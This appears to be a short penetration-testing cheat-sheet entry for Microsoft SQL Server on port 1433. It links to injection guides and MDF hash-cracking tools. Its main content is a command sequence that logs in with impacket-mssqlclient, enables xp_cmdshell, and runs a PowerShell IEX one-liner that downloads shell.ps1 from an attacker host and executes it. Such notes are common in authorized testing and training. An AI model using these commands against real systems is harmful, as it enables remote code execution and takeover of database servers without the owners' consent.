tcp/1433 mssql

• RCE: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server#execute-commands

> impacket-mssqlclient <user>:<pass>@<ip>
> enable_xp_cmdshell
> xp_cmdshell powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://<ip>/shell.ps1\");

error-based injeciton

• https://www.exploit-db.com/papers/12975
• https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/

cracking mdf files

• https://github.com/improvedk/OrcaMDF
• https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes